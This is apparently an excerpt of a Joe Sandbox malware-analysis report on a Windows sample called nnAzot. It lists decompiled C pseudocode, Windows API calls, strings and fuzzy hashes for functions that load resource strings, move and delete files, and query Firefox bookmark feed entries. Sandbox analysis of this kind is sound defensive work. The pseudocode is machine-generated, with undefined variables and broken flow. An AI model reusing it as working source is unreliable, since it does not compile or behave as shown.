            • Instruction Fuzzy Hash: 84B1C635E00215DBCF26DF68C8816AEB7B5FF96310F25856AE945DB280E7B0DE80C790
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 96%
            			E003A35EE(struct HINSTANCE__* __ecx, int __edx) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				short _v1568;
            				signed int _v1572;
            				intOrPtr _v1576;
            				WCHAR* _v1580;
            				struct HINSTANCE__* _v1584;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t38;
            				signed int _t39;
            				struct _SECURITY_ATTRIBUTES* _t41;
            				int _t47;
            				intOrPtr _t50;
            				struct HINSTANCE__* _t51;
            				int _t52;
            				intOrPtr _t61;
            				struct HINSTANCE__* _t62;
            				struct HINSTANCE__* _t63;
            				int _t64;
            				void* _t65;
            				intOrPtr _t66;
            				signed int _t67;
            
            				_t60 = __edx;
            				_v8 =  *0x3a6004 ^ _t67;
            				_t51 = __ecx;
            				_t64 = __edx;
            				_v1584 = __ecx;
            				_v1580 = __edx;
            				if(LoadStringW(__ecx, 0x5601,  &_v1048, 0x104) == 0) {
            					_t61 = 0x80004005;
            					_v1576 = 0x80004005;
            				} else {
            					_t60 =  &_v528;
            					_t50 = E003A3407(_t51, _t64,  &_v528,  &_v1048);
            					_t61 = _t50;
            					_v1576 = _t50;
            				}
            				if(_t61 < 0) {
            					L21:
            					return E003A4AAD(_t61, _t51, _v8 ^ _t67, _t60, _t61, _t64);
            				} else {
            					_t65 = 0x5610;
            					do {
            						_t60 = _v1580;
            						E003A3472(_t51, _v1580, _t61, _t65);
            						_t65 = _t65 + 1;
            					} while (_t65 <= 0x5613);
            					_v1572 = _v1572 & 0x00000000;
            					_t52 = 0x5630;
            					_t62 = _v1584;
            					_t66 = _v1580;
            					do {
            						if(LoadStringW(_t62, _t52,  &_v1048, 0x104) == 0) {
            							_t38 = 0x80004005;
            						} else {
            							_t60 =  &_v1568;
            							_t38 = E003A3407(_t52, _t66,  &_v1568,  &_v1048);
            						}
            						if(_t38 < 0) {
            							_t39 = _v1572;
            						} else {
            							_t47 = PathFileExistsW( &_v1568);
            							_t39 = _v1572;
            							if(_t47 != 0) {
            								_t39 = _t39 + 1;
            								_v1572 = _t39;
            							}
            						}
            						_t52 = _t52 + 1;
            					} while (_t52 <= 0x5631);
            					_t61 = _v1576;
            					_t64 = 0x5630;
            					if(_t39 < 2) {
            						goto L21;
            					}
            					_t41 = PathFileExistsW( &_v528);
            					if(_t41 != 0 || CreateDirectoryW( &_v528, _t41) != 0) {
            						_t63 = _v1584;
            						do {
            							_t60 = _v1580;
            							E003A3528(_t63, _v1580, _t63,  &_v528, _t64);
            							_t64 = _t64 + 1;
            						} while (_t64 <= 0x5631);
            						_t61 = _v1576;
            					}
            					goto L21;
            				}
            			}

            APIs
            • LoadStringW.USER32(?,00005601,?,00000104), ref: 003A3628
            • LoadStringW.USER32(?,00005630,?,00000104), ref: 003A36A5
            • PathFileExistsW.SHLWAPI(?), ref: 003A36D5
            • PathFileExistsW.SHLWAPI(?), ref: 003A3714
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3726
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExistsFileLoadPathString$CreateDirectory
            • String ID:
            • API String ID: 2019810426-0
            • Opcode ID: 80555ae0df5ebe5edd3020badd95fbc20137401722b1d37aaa667af1687ef087
            • Instruction ID: a34be8ca14a82a92b5dc81ec1303f18b98bd758c954cffe2761e574056f3ff05
            • Opcode Fuzzy Hash: 80555ae0df5ebe5edd3020badd95fbc20137401722b1d37aaa667af1687ef087
            • Instruction Fuzzy Hash: DE4196B1E00528ABDB22DF21CC84ADEB7BEEB89310F1541E5E509E7250D7329F558F54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph
            C-Code - Quality: 96%
            			E003A3EE7(signed short** __edx) {
            				wchar_t* _v8;
            				signed short** _v12;
            				void* __ecx;
            				void* _t17;
            				void* _t18;
            				signed short* _t19;
            				signed short* _t20;
            				int _t22;
            				signed short* _t25;
            				wchar_t* _t26;
            				signed short* _t28;
            				intOrPtr* _t31;
            				signed short* _t32;
            				wchar_t* _t40;
            				intOrPtr* _t45;
            				long* _t51;
            				void* _t52;
            				long _t55;
            				signed short* _t59;
            				wchar_t* _t61;
            
            				_push(_t32);
            				_push(_t32);
            				_t59 = _t32;
            				_v12 = __edx;
            				if(_t59 == 0 ||  *_t59 == 0 || __edx == 0) {
            					L26:
            					_t17 = 0x80070057;
            				} else {
            					 *__edx = 0;
            					_t18 = E003A3CA0(_t59,  &_v8);
            					_t55 = 0x5c;
            					if(_t18 == 0) {
            						__eflags =  *_t59 - _t55;
            						if(__eflags != 0) {
            							L16:
            							_t19 = E003A476C(_t59, __eflags);
            							__eflags = _t19;
            							if(_t19 == 0) {
            								_t20 = E003A46C3(_t59, L"\\\\?\\", 4);
            								__eflags = _t20;
            								if(_t20 != 0) {
            									_t59 =  &(_t59[4]);
            									__eflags = _t59;
            								}
            								_t22 = iswalpha( *_t59 & 0x0000ffff);
            								__eflags = _t22;
            								if(_t22 == 0) {
            									goto L26;
            								} else {
            									__eflags = _t59[1] - 0x3a;
            									if(_t59[1] != 0x3a) {
            										goto L26;
            									} else {
            										_t59 =  &(_t59[2]);
            										__eflags = _t59;
            										goto L23;
            									}
            								}
            							} else {
            								_t59 =  &(_t59[0x30]);
            								L23:
            								__eflags =  *_t59 - _t55;
            								if( *_t59 == _t55) {
            									goto L24;
            								}
            								goto L25;
            							}
            						} else {
            							__eflags = _t59[1] - _t55;
            							if(__eflags != 0) {
            								goto L24;
            							} else {
            								goto L16;
            							}
            						}
            					} else {
            						_t61 = _v8;
            						_t31 = wcschr(_t61, _t55);
            						if(_t31 == 0) {
            							_t40 = _t61;
            							__eflags = 0;
            							_t51 =  &(_t40[0]);
            							do {
            								_t25 =  *_t40;
            								_t40 =  &(_t40[0]);
            								__eflags = _t25;
            							} while (_t25 != 0);
            							_t59 = _t61 + (_t40 - _t51 >> 1) * 2;
            						} else {
            							_t4 = _t31 + 2; // 0x2
            							_t26 = _t4;
            							_v8 = _t26;
            							_t59 = wcschr(_t26, _t55);
            							if(_t59 == 0) {
            								_t45 = _t31;
            								__eflags = 0;
            								_t7 = _t45 + 2; // 0x2
            								_t52 = _t7;
            								do {
            									_t28 =  *_t45;
            									_t45 = _t45 + 2;
            									__eflags = _t28;
            								} while (_t28 != 0);
            								_t59 = _t31 + (_t45 - _t52 >> 1) * 2;
            							} else {
            								if(_t59 != _v8) {
            									L24:
            									_t59 =  &(_t59[1]);
            								}
            							}
            						}
            						L25:
            						 *_v12 = _t59;
            						_t17 = 0;
            					}
            				}
            				return _t17;
            			}

            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: wcschr
            • String ID: \\?\
            • API String ID: 1497570035-4282027825
            • Opcode ID: 6fc51a6ddcb298f881916c5fb3863286509c3071f3b6a74545fb7b5ac2938cf9
            • Instruction ID: b8115e837705adbdded44177f26dfd2fb0380d720b61e7d16aeb95f17ddbbb62
            • Opcode Fuzzy Hash: 6fc51a6ddcb298f881916c5fb3863286509c3071f3b6a74545fb7b5ac2938cf9
            • Instruction Fuzzy Hash: B131F736E112119FDF369B14880597BB3B4DB83750727405EFD469BA80E7629F41C690
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph
            C-Code - Quality: 36%
            			E003A2A22(void* __ecx, void* __edi, intOrPtr _a4, signed int* _a8) {
            				signed int _v8;
            				char _v2060;
            				char _v2064;
            				char _v2068;
            				signed int* _v2072;
            				signed int _v2076;
            				void* __ebx;
            				void* __esi;
            				intOrPtr* _t40;
            				signed int _t43;
            				signed int _t44;
            				void* _t45;
            				void* _t46;
            				signed int _t48;
            				signed int _t49;
            				void* _t50;
            				intOrPtr _t59;
            				void* _t70;
            				void* _t71;
            				char _t72;
            				signed int _t74;
            				intOrPtr _t81;
            
            				_t71 = __edi;
            				_t50 = __ecx;
            				_v8 =  *0x3a6004 ^ _t74;
            				_v2072 = _a8;
            				_t72 = 0;
            				if(E003A295F() == 0) {
            					L11:
            					return E003A4AAD(_t72, _t48, _v8 ^ _t74, _t69, _t71, _t72);
            				}
            				_v2068 = 0;
            				_v2064 = 0;
            				E003A2225( &_v2060, 0x400, L"select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes as a on b.id=ai.item_id and a.id=ai.anno_attribute_id where a.name=\'livemark/feedURI\' and b.id=%d", _a4);
            				if(E003A2B5D(_t50,  &_v2060,  &_v2068) < 0 || E003A259E(0x3a6448, _v2068) < 0) {
            					L10:
            					E003A27B8( &_v2068, _t83);
            					goto L11;
            				} else {
            					_push(0);
            					_push(_v2068);
            					if( *0x3a64c4() > 0) {
            						_t49 = 2;
            						_t40 =  *0x3a64e8(_v2068, _t49);
            						_t13 = _t40 + 2; // 0x2
            						_t70 = _t13;
            						do {
            							_t59 =  *_t40;
            							_t40 = _t40 + _t49;
            							_t81 = _t59;
            						} while (_t81 != 0);
            						_t43 = (_t40 - _t70 >> 1) + 1;
            						_v2076 = _t43;
            						_t69 = _t43 * _t49 >> 0x20;
            						_t44 = _t43 * _t49;
            						__imp__??2@YAPAXI@Z( ~(0 | _t81 > 0x00000000) | _t44);
            						_t48 = _t44;
            						if(_t48 != 0) {
            							_t45 =  *0x3a64e8(_v2068, 2);
            							_t69 = _v2076;
            							_t46 = E003A25DB(_t48, _v2076, _t45);
            							_t83 = _t46;
            							if(_t46 < 0) {
            								__imp__??3@YAXPAX@Z(_t48);
            							} else {
            								_t72 = 1;
            								 *_v2072 = _t48;
            							}
            						}
            					}
            					goto L10;
            				}
            			}

            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • ??2@YAPAXI@Z.MSVCRT ref: 003A2AF5
            • ??3@YAXPAX@Z.MSVCRT ref: 003A2B32
            Strings
            • select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes, xrefs: 003A2A60
            • Hd:, xrefs: 003A2A9A
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ??2@??3@_vsnwprintf
            • String ID: Hd:$select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes
            • API String ID: 1401084937-4012710142
            • Opcode ID: 66cf2668f384c4416a99131a034821a8cfe6def194416e3f6f9d173da0bc907d
            • Instruction ID: 04fd369dfc5c8547f110ebdae05d61f26e9c1ffb4d719811dc8c3900440762dd
            • Opcode Fuzzy Hash: 66cf2668f384c4416a99131a034821a8cfe6def194416e3f6f9d173da0bc907d
            • Instruction Fuzzy Hash: 1431A4316002199FDB26AF28DD46EDB77ECFF06310F0085AAE945D6191DE709E858FE0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph
            C-Code - Quality: 95%
            			E003A3528(struct HINSTANCE__* __ecx, int __edx, void* __edi, intOrPtr _a4, int _a8) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				short _v1568;
            				void* __ebx;
            				void* __esi;
            				int _t26;
            				void* _t34;
            				struct HINSTANCE__* _t35;
            				signed int _t36;
            
            				_t34 = __edi;
            				_t33 = __edx;
            				_v8 =  *0x3a6004 ^ _t36;
            				_t35 = __ecx;
            				_t3 =  &_a8; // 0x3a374b
            				_t26 = __edx;
            				if(LoadStringW(__ecx,  *_t3,  &_v1048, 0x104) != 0) {
            					if(LoadStringW(_t35, _a8,  &_v528, 0x104) == 0) {
            						_t18 = 0x80004005;
            					} else {
            						_t33 =  &_v1568;
            						_t18 = E003A3407(_t26, _t26,  &_v1568,  &_v528);
            					}
            					if(_t18 >= 0) {
            						_t33 = 0x104;
            						if(E003A25DB( &_v528, 0x104, _a4) >= 0 && E003A4672( &_v528,  &_v1048) >= 0) {
            							_t18 = MoveFileW( &_v1568,  &_v528);
            						}
            					}
            				}
            				return E003A4AAD(_t18, _t26, _v8 ^ _t36, _t33, _t34, _t35);
            			}

            APIs
            • LoadStringW.USER32(?,K7:,?,00000104), ref: 003A3553
            • LoadStringW.USER32(?,?,?,00000104), ref: 003A356D
            • MoveFileW.KERNEL32 ref: 003A35D1
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: LoadString$FileMove
            • String ID: K7:
            • API String ID: 600763028-3582313141
            • Opcode ID: 6c79f4e31cc790f393906a9e344fbfa6323853d7c0a97ff17d1b41e948475e1e
            • Instruction ID: 4acbb6cc4d94874b5155ddb8efcf2df4e309c1a9d7396e5573a9805f422e2dd2
            • Opcode Fuzzy Hash: 6c79f4e31cc790f393906a9e344fbfa6323853d7c0a97ff17d1b41e948475e1e
            • Instruction Fuzzy Hash: B01182B1A0021CABDB12DF24DC84AFE77BDEB46350F1082A6BA15D6151DB30DF48CE64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E003A3472(struct HINSTANCE__* __ecx, short* __edx, void* __edi, int _a4) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				void* __esi;
            				void* _t21;
            				WCHAR* _t25;
            				int _t27;
            				void* _t30;
            				WCHAR* _t31;
            				signed int _t32;
            
            				_t30 = __edi;
            				_t29 = __edx;
            				_v8 =  *0x3a6004 ^ _t32;
            				_t31 = __edx;
            				if(LoadStringW(__ecx, _a4,  &_v1048, 0x104) == 0) {
            					_t15 = 0x80004005;
            				} else {
            					_t29 =  &_v528;
            					_t15 = E003A3407(_t21, _t31,  &_v528,  &_v1048);
            				}
            				if(_t15 < 0) {
            					L10:
            					return E003A4AAD(_t15, _t21, _v8 ^ _t32, _t29, _t30, _t31);
            				} else {
            					_t25 = _t31;
            					_t29 =  &(_t25[1]);
            					do {
            						_t15 =  *_t25;
            						_t25 =  &(_t25[1]);
            					} while (_t15 != 0);
            					_t27 = _t25 - _t29 >> 1;
            					if(_t27 > 3 && StrCmpNW(_t31,  &_v528, _t27) == 0 && StrStrW( &_v528, L"..") == 0) {
            						_t15 = DeleteFileW( &_v528);
            					}
            					goto L10;
            				}
            			}

            APIs
            • LoadStringW.USER32(?,003A3676,?,00000104), ref: 003A349A
            • StrCmpNW.SHLWAPI(?,?,?), ref: 003A34E5
            • StrStrW.SHLWAPI(?,003A1ACC), ref: 003A34FB
            • DeleteFileW.KERNEL32(?), ref: 003A350C
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: DeleteFileLoadString
            • String ID:
            • API String ID: 1470351836-0
            • Opcode ID: f2d2b4faf1621391206c3f4fe98e82d420472b5ec6648442b4a678fed4759f50
            • Instruction ID: a24689a7e902abf295c65da7e976512dc143ae2c7dc2fc70e2e8ed6127d9c27c
            • Opcode Fuzzy Hash: f2d2b4faf1621391206c3f4fe98e82d420472b5ec6648442b4a678fed4759f50
            • Instruction Fuzzy Hash: 7E1106B5A00218ABCB22EB65DC49AFA776CDF4A300F0141A9FD06C7141E730DF44CA64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A480D() {
            				signed int _t10;
            				void* _t15;
            				signed int _t18;
            				intOrPtr _t19;
            				void* _t25;
            
            				_t25 =  *0x3a0000 - 0x5a4d; // 0x5a4d
            				if(_t25 == 0) {
            					_t19 =  *0x3a003c; // 0xe0
            					__eflags =  *((intOrPtr*)(_t19 + 0x3a0000)) - 0x4550;
            					if( *((intOrPtr*)(_t19 + 0x3a0000)) != 0x4550) {
            						goto L1;
            					} else {
            						_t2 = _t19 + 0x3a0018; // 0xb010b
            						_t18 =  *_t2 & 0x0000ffff;
            						__eflags = _t18 - 0x10b;
            						if(_t18 == 0x10b) {
            							_t10 = 0;
            							__eflags =  *((intOrPtr*)(_t19 + 0x3a0074)) - 0xe;
            							if( *((intOrPtr*)(_t19 + 0x3a0074)) > 0xe) {
            								__eflags =  *(_t19 + 0x3a00e8);
            								goto L9;
            							}
            						} else {
            							__eflags = _t18 - 0x20b;
            							if(_t18 != 0x20b) {
            								goto L1;
            							} else {
            								_t10 = 0;
            								__eflags =  *((intOrPtr*)(_t19 + 0x3a0084)) - 0xe;
            								if( *((intOrPtr*)(_t19 + 0x3a0084)) > 0xe) {
            									__eflags =  *(_t19 + 0x3a00f8);
            									L9:
            									_t8 = __eflags != 0;
            									__eflags = _t8;
            									_t10 = _t10 & 0xffffff00 | _t8;
            								}
            							}
            						}
            					}
            				} else {
            					L1:
            					_t10 = 0;
            				}
            				 *0x3a6058 = _t10;
            				__set_app_type(E003A4C48(1));
            				 *0x3a66b4 =  *0x3a66b4 | 0xffffffff;
            				 *0x3a66b8 =  *0x3a66b8 | 0xffffffff;
            				 *(__p__fmode()) =  *0x3a606c;
            				 *(__p__commode()) =  *0x3a6060;
            				_t15 = E003A4C8F();
            				if( *0x3a6000 == 0) {
            					__setusermatherr(E003A4C8F);
            				}
            				E003A4E9F(_t15);
            				return 0;
            			}

            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
            • String ID:
            • API String ID: 1063105408-0
            • Opcode ID: e71c0a4238abaed1a01e7562ef6a1328450fad12cc85da980d382012f65cad90
            • Instruction ID: 9b3443eebfbbd7b3dd1fcd361634492c38f8d67488dec02edfb08e63e9ddda14
            • Opcode Fuzzy Hash: e71c0a4238abaed1a01e7562ef6a1328450fad12cc85da980d382012f65cad90
            • Instruction Fuzzy Hash: 77113030905340CFC76BDB30EC5D22537A8EB83326F25466ED4268A1E1D7BF8986DB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E003A3D00(signed short* __ecx) {
            				signed short* _v8;
            				signed short _t10;
            				long _t11;
            				void* _t13;
            				signed short _t14;
            				signed short _t16;
            				signed short* _t21;
            				signed int _t33;
            				void* _t38;
            				void* _t43;
            				void* _t44;
            				intOrPtr* _t46;
            
            				_push(__ecx);
            				_t46 = __ecx;
            				if(__ecx == 0) {
            					L21:
            					_t10 = 0;
            					__eflags = 0;
            				} else {
            					_t11 =  *__ecx & 0x0000ffff;
            					if(_t11 == 0) {
            						goto L21;
            					} else {
            						if(iswalpha(_t11) == 0 || E003A46C3(_t46 + 2, L":\\", 3) == 0) {
            							_t13 = 0x5c;
            							__eflags =  *_t46 - _t13;
            							if( *_t46 != _t13) {
            								L7:
            								_t14 = E003A3CA0(_t46,  &_v8);
            								__eflags = _t14;
            								if(_t14 == 0) {
            									__eflags = E003A46C3(_t46, L"\\\\?\\", 4);
            									if(__eflags == 0) {
            										L18:
            										_t16 = E003A476C(_t46, __eflags);
            										__eflags = _t16;
            										if(_t16 == 0) {
            											goto L21;
            										} else {
            											_t43 = 0x5c;
            											__eflags =  *((intOrPtr*)(_t46 + 0x60)) - _t43;
            											if( *((intOrPtr*)(_t46 + 0x60)) != _t43) {
            												goto L21;
            											} else {
            												__eflags =  *(_t46 + 0x62);
            												if( *(_t46 + 0x62) == 0) {
            													goto L4;
            												} else {
            													goto L21;
            												}
            											}
            										}
            									} else {
            										__eflags = iswalpha( *(_t46 + 8) & 0x0000ffff);
            										if(__eflags == 0) {
            											goto L18;
            										} else {
            											__eflags = E003A46C3(_t46 + 0xa, L":\\", 3);
            											if(__eflags != 0) {
            												goto L4;
            											} else {
            												goto L18;
            											}
            										}
            									}
            								} else {
            									_t21 = _v8;
            									_t38 = 0;
            									_t33 =  *_t21 & 0x0000ffff;
            									__eflags = _t33;
            									if(_t33 != 0) {
            										_t44 = 0x5c;
            										do {
            											__eflags = _t33 - _t44;
            											if(_t33 != _t44) {
            												goto L13;
            											} else {
            												_t38 = _t38 + 1;
            												__eflags = _t38 - 1;
            												if(_t38 > 1) {
            													goto L21;
            												} else {
            													__eflags = _t21[1];
            													if(_t21[1] == 0) {
            														goto L21;
            													} else {
            														goto L13;
            													}
            												}
            											}
            											goto L22;
            											L13:
            											_t21 =  &(_t21[1]);
            											_t33 =  *_t21 & 0x0000ffff;
            											__eflags = _t33;
            										} while (_t33 != 0);
            									}
            									goto L4;
            								}
            							} else {
            								__eflags =  *(_t46 + 2);
            								if( *(_t46 + 2) == 0) {
            									goto L4;
            								} else {
            									goto L7;
            								}
            							}
            						} else {
            							L4:
            							_t10 = 1;
            						}
            					}
            				}
            				L22:
            				return _t10;
            }

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: iswalpha
            • String ID: \\?\
            • API String ID: 2011389249-4282027825
            • Opcode ID: 91e057be700fc22ab160924158e8761087df022875148b9f1fb7035613160c47
            • Instruction ID: 0c5418603a2fda90779a671fb7f28173ec90a4f319c6631ea7565b51654e1a38
            • Opcode Fuzzy Hash: 91e057be700fc22ab160924158e8761087df022875148b9f1fb7035613160c47
            • Instruction Fuzzy Hash: D121DA25700751D6DA37EB668C11A3BF2A8DF83B90F268429F942CB5D0FB61DF41C2A0
            Uniqueness
            • Uniqueness Score: -1.00%